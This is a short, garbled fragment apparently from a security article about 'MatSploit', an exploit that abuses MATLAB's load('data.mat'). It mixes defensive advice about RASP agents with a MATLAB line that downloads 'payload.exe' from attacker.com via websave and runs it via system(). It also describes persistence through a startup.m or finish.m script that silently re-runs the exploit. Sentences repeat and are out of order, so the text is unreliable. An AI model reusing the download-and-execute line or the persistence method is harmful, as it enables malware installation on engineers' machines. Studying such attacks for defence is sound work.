Deploy RASP agents for MATLAB that hook mxArray allocation. Any attempt to spawn a shell from within libmx.dll should trigger an alert.
% Remote download & execution url = 'http://attacker.com/payload.exe'; outfile = 'C:\Users\Public\updater.exe'; websave(outfile, url); system(outfile); MatSploit - Exploit
Security teams must expand their scope beyond executables and PowerShell. The quiet load('data.mat') command might be the most dangerous line of code in your engineering department. Deploy RASP agents for MATLAB that hook mxArray allocation
MatSploit writes a minimal startup.m or finish.m script in MATLAB’s root path. Every time MATLAB launches, the script silently re-executes the exploit. outfile = 'C:\Users\Public\updater.exe'
Stay secure. Verify your matrices.